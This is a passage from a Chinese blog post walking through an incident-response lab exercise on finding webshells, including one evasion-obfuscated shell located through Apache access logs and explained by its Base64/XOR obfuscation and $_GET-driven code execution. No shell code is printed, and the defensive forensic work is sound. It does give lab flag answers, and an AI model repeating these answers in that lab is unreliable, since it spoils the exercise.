    tail -f /var/log/apache2/access.log tail -f /var/log/nginx/access.log

    可以使用日志分析工具（如GoAccess、AWStats）生成可视化的日志报告。
</code></pre>
<p>既然它经过了免杀处理，那么木马的特征值以及特征函数应该都是被去掉了。这时我们再通过静态检测是基本检测不到的，从上面我们就可以看出我们只找到了三个马。而且上面我们说了webshell执行会在网站日志留下记录，那我们就到网站日志里面看看有啥可疑的记录。<br>我们到apache2目录下面查看一下access.log日志，查看分析一下；（因为是日志所以记录有点多）</p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="http://images.lwwww.top/images/20250305110800386.png"
                        alt="https:&#x2F;&#x2F;i-blog.csdnimg.cn&#x2F;blog_migrate&#x2F;058e435a4bcada8e8a8295312016d4fa.png#pic_center"
                 ></p>
<p>大部分都是重复的只有少数不一样的； 我们可以看到有个名为top.php的文件执行了phpinfo()；且返回值为200，有点可疑。去找到相对应的文件发现是一个正常的文件来。  </p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="http://images.lwwww.top/images/20250305110757731.png"
                       
                 ></p>
<p>继续往下翻，又发现一个较为可疑的文件，到此目录下面查看该文件。 目录：&#x2F;wap&#x2F;top.php </p>
<p><img  
                       lazyload
                       alt="image"
                       data-src="http://images.lwwww.top/images/20250305110802248.png"
                       
                 ></p>
<p> 原来是个恶意文件，最后把路径进行md5进行加密即可； 路径：&#x2F;var&#x2F;www&#x2F;html&#x2F;wap&#x2F;top.php </p>
<h5 id="为什么可以确认是恶意文件？"><a href="#为什么可以确认是恶意文件？" class="headerlink" title="为什么可以确认是恶意文件？"></a>为什么可以确认是恶意文件？</h5><p>混淆和隐藏：</p>
<pre><code>使用Base64编码和字符异或操作来混淆代码。这些技术通常用于隐藏恶意代码，避免被直接检测到。
</code></pre>
<p>动态执行：</p>
<pre><code>动态生成并调用函数。这种模式允许攻击者通过URL参数传递任意代码并在服务器上执行，具有极大的危险性。
</code></pre>
<p>外部输入：</p>
<pre><code>使用$_GET参数来控制代码行为。通过外部输入来决定代码逻辑，使得攻击者可以远程控制服务器，执行任意PHP代码。
</code></pre>
<p><img  
                       lazyload
                       alt="image"
                       data-src="http://images.lwwww.top/images/20250305110804008.png"
                       
                 ></p>
<p>还有一种思路和做法就是把var文件下载下来压缩zip扔到在线查杀网站里面，让他们去查杀</p>
<p>同样的道理在线下应该是用D盾查杀</p>

                    
                </div>

                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                玄机靶场
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2025/03/04/玄机靶场/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    Author
                </div>
                <div class="content">Lwwww</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    Published
                </div>
                <div class="content">2025-03-04 16:00</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    License
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="Copy copyright info" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/WP-%E7%8E%84%E6%9C%BA-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/">-WP -玄机 -应急响应</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="Share to QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="Share to WeChat"
            data-tooltip-img-tip="Scan by WeChat"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="Share to WeiBo"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                
                    

<div class="reward-author-container border-box flex-center">
    <div class="reward-btn border-box flex-center tooltip tooltip-img"
            data-tooltip-img-url="/images/zs.jpg"
            data-tooltip-img-trigger="click"
            data-tooltip-img-style="top: -6px;"
    >
        <i class="fa-solid fa-gift"></i>&nbsp;给亮汪汪买点狗粮吧⋆⋅☆(✪Ω✪)☆⋅⋆
    </div>
</div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/03/11/%E5%88%9D%E8%AF%86%E5%86%85%E5%AD%98%E9%A9%AC/"
                                   title="初识内存马"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">初识内存马</span>
                                        <span class="post-nav-item">Prev posts</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/03/02/3%E6%9C%883-3%E6%9C%888%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1/"
                                   title="3月3--3月8计划任务"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">3月3--3月8计划任务</span>
                                        <span class="post-nav-item">Next posts</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-webshell%E6%9F%A5%E6%9D%80"><span class="nav-text">第一章 应急响应-webshell查杀</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E9%BB%91%E5%AE%A2webshell%E9%87%8C%E9%9D%A2%E7%9A%84flag-flag-xxxxx-xxxx-xxxx-xxxx-xxxx"><span class="nav-text">1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A5%E9%AA%A4-1-2%E9%BB%91%E5%AE%A2%E4%BD%BF%E7%94%A8%E7%9A%84%E4%BB%80%E4%B9%88%E5%B7%A5%E5%85%B7%E7%9A%84shell-github%E5%9C%B0%E5%9D%80%E7%9A%84md5-flag-md5"><span class="nav-text">步骤#1.2黑客使用的什么工具的shell github地址的md5 flag{md5}</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A5%E9%AA%A4-1-3%E9%BB%91%E5%AE%A2%E9%9A%90%E8%97%8Fshell%E7%9A%84%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84%E7%9A%84md5-flag-md5-%E6%B3%A8-xxx-xxx-xxx-xxx-xxx-xxx"><span class="nav-text">步骤#1.3黑客隐藏shell的完整路径的md5 flag{md5} 注 : &#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx.xxx</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A5%E9%AA%A4-1-4%E9%BB%91%E5%AE%A2%E5%85%8D%E6%9D%80%E9%A9%AC%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84-md5-flag-md5"><span class="nav-text">步骤#1.4黑客免杀马完整路径 md5 flag{md5}</span></a></li><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-text"></span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%85%8D%E6%9D%80%E9%A9%AC%EF%BC%9F"><span class="nav-text">什么是免杀马？</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E5%92%8C%E5%88%86%E6%9E%90%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%EF%BC%9F"><span class="nav-text">如何查看和分析日志文件？</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E5%8F%AF%E4%BB%A5%E7%A1%AE%E8%AE%A4%E6%98%AF%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6%EF%BC%9F"><span class="nav-text">为什么可以确认是恶意文件？</span></a></li></ol></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Lwwww</a>
        
    </div>

    <div class="theme-info info-item">
        Powered by&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;&&nbsp;Theme&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">Total words</span>
                    <span class="item-value border-box word">28k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">Unique Visitor</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">Page View</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-webshell%E6%9F%A5%E6%9D%80"><span class="nav-text">第一章 应急响应-webshell查杀</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E9%BB%91%E5%AE%A2webshell%E9%87%8C%E9%9D%A2%E7%9A%84flag-flag-xxxxx-xxxx-xxxx-xxxx-xxxx"><span class="nav-text">1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A5%E9%AA%A4-1-2%E9%BB%91%E5%AE%A2%E4%BD%BF%E7%94%A8%E7%9A%84%E4%BB%80%E4%B9%88%E5%B7%A5%E5%85%B7%E7%9A%84shell-github%E5%9C%B0%E5%9D%80%E7%9A%84md5-flag-md5"><span class="nav-text">步骤#1.2黑客使用的什么工具的shell github地址的md5 flag{md5}</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A5%E9%AA%A4-1-3%E9%BB%91%E5%AE%A2%E9%9A%90%E8%97%8Fshell%E7%9A%84%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84%E7%9A%84md5-flag-md5-%E6%B3%A8-xxx-xxx-xxx-xxx-xxx-xxx"><span class="nav-text">步骤#1.3黑客隐藏shell的完整路径的md5 flag{md5} 注 : &#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx&#x2F;xxx.xxx</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AD%A5%E9%AA%A4-1-4%E9%BB%91%E5%AE%A2%E5%85%8D%E6%9D%80%E9%A9%AC%E5%AE%8C%E6%95%B4%E8%B7%AF%E5%BE%84-md5-flag-md5"><span class="nav-text">步骤#1.4黑客免杀马完整路径 md5 flag{md5}</span></a></li><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-text"></span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%85%8D%E6%9D%80%E9%A9%AC%EF%BC%9F"><span class="nav-text">什么是免杀马？</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E6%9F%A5%E7%9C%8B%E5%92%8C%E5%88%86%E6%9E%90%E6%97%A5%E5%BF%97%E6%96%87%E4%BB%B6%EF%BC%9F"><span class="nav-text">如何查看和分析日志文件？</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E5%8F%AF%E4%BB%A5%E7%A1%AE%E8%AE%A4%E6%98%AF%E6%81%B6%E6%84%8F%E6%96%87%E4%BB%B6%EF%BC%9F"><span class="nav-text">为什么可以确认是恶意文件？</span></a></li></ol></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/libs/anime.min.js"></script>

<!-- local search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/local-search.min.js"></script>


<!-- lazyload -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/lazyload.min.js"></script>


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/copyright-info.min.js"></script>
        

        <!-- share -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.5/js/post/share.min.js"></script>
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



    
        
            
<script class="custom-inject-js" src="/js/usetime.js" data-pjax></script>

        
    

</body>
</html>
